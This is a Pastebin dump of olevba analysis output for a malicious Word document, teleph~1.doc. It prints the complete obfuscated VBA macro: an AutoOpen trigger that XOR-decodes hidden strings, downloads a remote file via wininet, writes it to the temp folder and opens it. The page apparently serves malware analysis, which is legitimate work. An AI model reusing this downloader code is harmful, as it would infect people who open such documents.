Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- teleph~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: teleph~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: teleph~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub COLTON(FELIX As Long)
- JOSPEH
- End Sub
- Sub autoopen()
- COLTON (298)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ELDRIDGE.bas
- in file: teleph~1.doc - OLE stream: u'Macros/VBA/ELDRIDGE'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub JOSPEH()
- Dim BERT As Long
- Dim MARCELLUS As Long
- For MARCELLUS = 5 To 11
- MARCELLUS = MARCELLUS * 3
- Next MARCELLUS
- DOMINGO (8.2)
- End Sub
- Public Function PORTER(EDMUNDO As Long, TERRENCE As String, ENRIQUE As String) As String
- EDMUNDO = EDMUNDO * 2
- PORTER = FRANKLYN(TERRENCE, ENRIQUE)
- End Function
- Public Function LYNWOOD(ByRef TITUS As Object, ByRef HOMER As Object) As Boolean
- Dim RENALDO As Long
- Set TITUS = WARNER(JEWEL)
- Dim JODY
- Dim AMBROSE As String
- AMBROSE = PORTER(3213, LEANDRO, JEROMY)
- For RENALDO = 11 To 33
- RENALDO = RENALDO * 4
- Next RENALDO
- JODY = TITUS & AMBROSE
- If ANTIONE(475, JODY) Then
- End If
- LYNWOOD = MICHAL(TITUS, AMBROSE, 11)
- End Function
- Public Function GASTON(ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
- GASTON = ChrW(GAYLORD Xor MANUAL)
- End Function
- Public Function LOWELL(BRODNATHANIAL As String) As Integer
- LOWELL = FreeFile
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | ChrW | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FELTON.bas
- in file: teleph~1.doc - OLE stream: u'Macros/VBA/FELTON'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const RUEBEN = 5555
- Public Const STACYK As String = "ARNOLDO"
- Public Const HARLAND = 1
- Public Const ELIJAH = &H4000000
- Public Const HOBERT = "1B293C22296D002222232551323C283620"
- Public Const JEROMY = "14323C3C20212E396061294A36"
- Public Const JERRELL = "20352D3E7F6C6E3F3D3D3E5B203C2E373C23202C333E2A2F5A3C2133772137246E63667C630165706F3C3620"
- Public Const KRAIG = "1B222B273537283C35610A5B3F2D12203D31262C1D3025295127"
- Public Const LEANDRO = "SHAYNECARROL2"
- Sub DOMINGO(SANTOS As Double)
- AUBREY ("DEANGELOFILIBERTO")
- End Sub
- Public Function WARNER(ByRef ARLEN As Object) As Object
- Set WARNER = ARLEN.GetSpecialFolder(2)
- End Function
- Public Function FRANKLYN(NATHANIAL As String, REYNALDO As String) As String
- Dim GAYLORD As Integer
- Dim MANUAL As Integer
- Dim KRISTOFER As Integer
- For KRISTOFER = 43 To 44
- If KRISTOFER = 55 Then End
- Next KRISTOFER
- Dim CLAUD As Long
- Dim TERENCE As String
- For CLAUD = 1 To (JORDON(REYNALDO) / 2)
- GAYLORD = FRANCESCO(REYNALDO, CLAUD)
- MANUAL = GILBERTO(NATHANIAL, CLAUD)
- TERENCE = TERENCE + GASTON(GAYLORD, MANUAL)
- Next CLAUD
- FRANKLYN = TERENCE
- End Function
- Public Function MICHAL(ByRef TITUS As Object, ByRef AMBROSE As String, CRISTOBAL As Double) As Boolean
- Dim SHERWOOD As String
- SHERWOOD = FRANKLYN(LEANDRO, HOBERT)
- Set RAYFORD = CreateObject(SHERWOOD)
- Dim RAYMON As Integer
- RAYMON = RAYFORD.Open(TITUS & AMBROSE)
- End Function
- Public Function AUBREY(SANTIAGO As String)
- Dim LESLEY As Integer
- LESLEY = 1
- DARELL LESLEY * 2
- LESLEY = LESLEY + 4
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO MICHALE.bas
- in file: teleph~1.doc - OLE stream: u'Macros/VBA/MICHALE'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function JORDON(BRODNATHANIAL As String) As Long
- JORDON = Len(BRODNATHANIAL)
- End Function
- Public Function DARELL(DORSEY As Double)
- Dim PORTER As Object
- Dim ELDEN As Long
- For ELDEN = 14 To 15
- ELDEN = ELDEN + 15
- Next ELDEN
- Dim HAI As Object
- For ELDEN = 10 To 20
- ELDEN = ELDEN + 60
- Next ELDEN
- Set HAI = JEWEL
- ELDEN = ELDEN + 5
- Dim LINDSAY As Boolean
- If ELDEN > ELDEN * 100 Then End
- LINDSAY = LYNWOOD(PORTER, HAI)
- DORSEY = DORSEY + 24
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO TUAN.bas
- in file: teleph~1.doc - OLE stream: u'Macros/VBA/TUAN'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function GILBERTO(ByRef NATHANIAL As String, ByRef CLAUD As Long) As Integer
- GILBERTO = AscW(DANILO(17, NATHANIAL, ((CLAUD Mod JORDON(NATHANIAL)) + 1), 1))
- End Function
- #If VBA7 And Win64 Then
- Public Function CEDRICK(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function CEDRICK(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim PHIL As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- GUADALUPE = PORTER(321, LEANDRO, JERRELL)
- For PHIL = 14 To 18
- PHIL = PHIL + 2.1
- Next PHIL
- GRADY = LUIGI(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
- CEDRICK = True
- End Function
- Public Function JEWEL() As Object
- Dim ISMAEL As String
- ISMAEL = FRANKLYN(LEANDRO, KRAIG)
- Set JEWEL = CreateObject(ISMAEL)
- End Function
- Public Function PORTER(EDMUNDO As Long, TERRENCE As String, ENRIQUE As String) As String
- EDMUNDO = EDMUNDO * 2
- PORTER = FRANKLYN(TERRENCE, ENRIQUE)
- End Function
- Public Function ANTIONE(KOREY As Double, ByVal MALCOM As String) As Boolean
- Dim LAMONT As Long
- Dim STACY As String * RUEBEN, GARLAND As String
- Dim MILES As Integer, MICAH As Double
- #If VBA7 And Win64 Then
- Dim KASEY As LongPtr, BENTON As LongPtr
- #Else
- Dim KASEY As Long, BENTON As Long
- #End If
- KASEY = WALLY
- If KASEY = 0 Then
- Exit Function
- End If
- Dim LUCAS As Boolean
- If CEDRICK(BENTON, KASEY) Then
- End If
- If BENTON = 0 Then
- CRISTOPHER = 0
- Else
- KENETH BENTON, STACY, RUEBEN, LAMONT
- GARLAND = STACY
- Dim BOYCE As Integer
- BOYCE = 0
- BOYCE = BOYCE + 33
- If BOYCE > BOYCE + 40 Then End
- Do While LAMONT <> 0
- KENETH BENTON, STACY, RUEBEN, LAMONT
- GARLAND = GARLAND + Mid(STACY, 1, LAMONT)
- Loop
- CRISTOPHER = JORDON(GARLAND): _
- CORTEZ = LOWELL("JERRY")
- Open MALCOM For Binary Access Write Lock Write As #CORTEZ
- Put #CORTEZ, , GARLAND
- BOYCE = BOYCE + 46
- If BOYCE < 0 Then End
- Close #CORTEZ
- End If
- GRAIG BENTON
- GRAIG KASEY
- GARLAND = ""
- If CRISTOPHER Then
- ANTIONE = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ZACKARY.bas
- in file: teleph~1.doc - OLE stream: u'Macros/VBA/ZACKARY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const SPORTER = "JOHN"
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- GRAIG Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- WINFORD Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal GARLAND As String, ByVal MALCOMPH As Long, ByVal THOMAS As String, ByVal FRANCESCOTOPHER As String, ByVal DANIEL As Long) As LongPtr
- Public _
- Declare _
- PtrSafe _
- Function _
- KENETH Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- LUIGI Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
- #Else
- Public Declare Function GRAIG Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
- Public Declare Function WINFORD Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal GARLAND As String, ByVal MALCOMPH As Long, ByVal THOMAS As String, ByVal FRANCESCOTOPHER As String, ByVal DANIEL As Long) As Long
- Public Declare Function KENETH Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal PAUL As Long, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare Function LUIGI Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
- #End If
- Public Function FRANCESCO(ByRef REYNALDO As String, ByRef CLAUD As Long) As Integer
- FRANCESCO = Val("&H" & (DANILO(12, REYNALDO, MODESTO(CLAUD), 2)))
- End Function
- Public Function MODESTO(ByRef CLAUD As Long) As Long
- MODESTO = (2 * CLAUD) - 1
- End Function
- Public Function DANILO(SAMMY As Long, ByRef BRODNATHANIAL As String, ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
- DANILO = Mid$(BRODNATHANIAL, GAYLORD, MANUAL)
- SAMMY = SAMMY + 52
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function WALLY() As LongPtr
- #Else
- Public Function WALLY() As Long
- #End If
- WALLY = WINFORD(STACYK, HARLAND, vbNullString, vbNullString, 0)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement